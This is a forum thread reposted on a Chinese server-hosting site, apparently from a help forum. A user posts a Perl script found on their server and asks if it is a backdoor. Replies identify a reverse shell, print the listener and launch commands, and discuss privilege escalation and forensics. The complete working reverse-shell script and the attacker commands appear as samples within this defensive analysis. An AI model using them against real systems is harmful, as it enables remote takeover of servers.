网站首页
云服务器
美国服务器
海外服务器
服务器租用
中国香港服务器
中国台湾服务器
韩国服务器
日本服务器
菲律宾服务器
马来西亚服务器
新加坡服务器
荷兰服务器
英国服务器
法国服务器
德国服务器
西班牙服务器
芬兰服务器
乌克兰服务器
悉尼服务器
南非服务器
巴西服务器
亚洲服务器
中国香港服务器
中国台湾服务器
韩国服务器
日本服务器
菲律宾服务器
马来西亚服务器
新加坡服务器
高防服务器
中国香港高防
美国高防
服务器托管
中国香港机房
美国服务器机房
韩国机房
日本机房
全球服务器
荷兰服务器
英国服务器
法国服务器
德国服务器
加州服务器
解决方案
网站建设
根据不同规模的网站提供可定制化的架构和 一站式协助
游戏运营
集游戏部署、游戏运营以及游戏安全三大要 素帮助游戏企业快速部署
视频娱乐
集源视频存储、高效自动转码切片技术以及 内容分发等功能,加速视频播放
企业上云
企业通过便捷的利用网络资源,实现管理、业务等方面的数据化转型,最大限度创造企业价值
智能家居
采用全托管的一站式物联网智能服务,轻松构 建多种智能网物联网最佳平台
制造业升级
多年制造业ERP部署经验,为广大制造业企业 提供高效可靠的数字化生产平台
大数据营销
低成本有效采集、分析、应用海量营销数据,降 低20%的人工成本,做到精准定位营销
外贸电商
为电商用户提供一站式解决方案,企业可根 据架构灵活调整配置,快速搭建电商平台
关于我们
023-63086558
技术解析
新闻资讯
公司新闻
行业资讯
服务器导购
技术解析
运营推广
香港服务器租用帮助
美国服务器租用帮助
日本服务器租用帮助
韩国服务器租用帮助
菲律宾服务器租用帮助
台湾服务器租用帮助
乌克兰服务器租用帮助
英国服务器租用帮助
荷兰服务器租用帮助
德国服务器租用帮助
服务器问答
热门标签
服务器托管
服务器租用
金融服务器
香港服务器
APP服务器
海外服务器
租用海外服务器
网站服务器
国外服务器
美国服务器
高防CDN
高防服务器
新加坡服务器
独立服务器
电影网站服务器
NAS存储服务器
私服服务器
首页
>
技术解析
服务器是不是被植入后门了? Linux 大神帮忙分析下
0
次
2021-06-30 10:28:05
idczone
cat envl_bc
#!/use/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname-a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDIN);
close(STDIN);
这个是个后门
后门+1
bc = backconnect
反弹了 shell 吧
reverse shell...
可以来个蜜罐走一波
运行这段代码能干啥
这是攻击的肉机吧
我表示没看懂,有大神给讲解讲解吗、
这个 perl 脚本接受两个参数,一个是监听服务器的 ip,一个是端口,这段代码就是把 sh shell 反弹到刚才所说的监听服务器上。那个监听服务器一般是用 netcat 做端口监听,接收 socket,命令一般是 `nc -lvp [port]`
假设黑客的监听端口是 2333, 服务器 IP 是 1.2.3.4, 那么黑客会在 1.2.3.4 这台服务器上运行 `nc -lvp 2333`
然后在楼主的服务器上运行 `perl envl_bc 1.2.3.4 2333`
如果网络顺畅的话,黑客就可以直接在他的服务器( 1.2.3.4 )直接控制楼主服务器的某个权限的 shell 了
多年前,大多数情况是服务器 web 服务存在漏洞,黑客利用这样的 shell 反弹技术运行 localroot(本地提权)程序 /脚本。
所以建议楼主查一下 web 服务(或不限于 web 服务)是否存在漏洞。
估计 web 目录已经躺着好几个 webshell 了。
我有点困惑,既然是后门,为嘛要用明码脚本来写呢?就算不会用 c/c++,用 python 编译搞一下,也比直接 perl 脚本让人一看就觉得蹊跷要好呀。。。。
感谢楼上各位分析,我看着像,不确定所以来问问
因为这是开个端口临时用的,会放更隐蔽的
楼主要查一下文件时间变动,看一下 log 操作记录,现在的服务器开任何端口给 外网操作都挺危险的,ssh/mysql 这些暴力破解的自动化程序满天飞
1.老旧的 linux/unix 服务器通常自带 perl,尤其是 unix (尤其在日本,日本很多老旧站点都是 perl cgi 开发的)。
2.perl 和其他多数语言一样,分号结尾,所有代码可以写在一行(显然这次是个例外),这样有个好处,就是在遇到命令执行漏洞的时候,非常管用,而 Python 做不到。
3.许多(老旧的包括现在,尤其是老旧的)服务器在生产环境下是不存在 c/cpp 编译环境的,但是国内很多 linux 服务器却都拥有编译环境。(编译环境对于本地提权来说是非常必要的,当然交叉编译 /自建环境编译除外,这些都很容易出错)
4.如 13 楼所说,临时用的,一般这种脚本在执行之后,都会立即进行提权,然后植入 rootkit,那些才是真正的后门,隐蔽性极高,没有取证 /渗透经验的人,通常是找不到的。这一次显然是由于黑客疏忽 /权限问题没有清除。
再补一条,这个反弹 shell 的脚本其实并不具备后门的特征,也不会给取证带来什么方便,简而言之,就是用这样的动态语言写的脚本其实并不会暴露黑客的信息,当然,在建立连接的时候,[可能]会在 history 里面留下黑客服务器的 IP 地址,网关那里也可能会有,但是这些代码并不会直接暴露黑客的信息,所以这代码是否源码可见对他来说都是安全的。
Python 也是可以放在一行来玩的
```
python -c 'print 123;print 456; print 789'
```
若服务器前端有硬件防火墙 以及开启软防火墙不是也没有效果的吧。
你讲的那些似乎我没有从脚本中看出来有那些命令(可能是水平还是很菜。23333 )
我前面描述有误,感谢指正。python 的确可以一行代码,比如一些 web 服务器和模板的命令执行漏洞( flask+jinja2 )都是一行 Python 做到的。
无论软 /硬防我个人觉得(可能有误)要看入站 /出站规则吧,另外它里面的日志可以用来取证。
你说一下我讲的哪一段你没有看出来,我再解释解释。
相关阅读
【放假通知】致客户--数据地带2022年元旦节放假通知
【放假通知】致客户--数据地带2021年国庆节放假通知
【放假通知】致客户--数据地带2021年中秋节放假通知
请教大佬 new Set([1,2,3].push(1))为什么会报 TypeError: 4 is not iterable
关于面试大文本正则匹配的问题,求教正则大佬
“JavaScript 的成员字段提案”或“TC39 委员会在搞什么鬼?”
有没有什么办法可以获取到一个 JSON 对象所有的 Value 值?
请教一下, Tampermonkey 我想屏蔽一个原素应该如何编写?
数据地带为您的网站提供全球顶级IDC资源
在线咨询
专属客服
免费电话:
023-63086558
24小时在线QQ
售前咨询-小秋
售前咨询-红豆
售前咨询-叶子
售前咨询-小邓
售前咨询-格桑
投诉建议
售后01
售后02
0
请您留言
感谢您的关注,当前客服人员不在线,请填写一下您的信息,我们会尽快和您联系。
提交
感谢留言
我们会尽快与您联系
关闭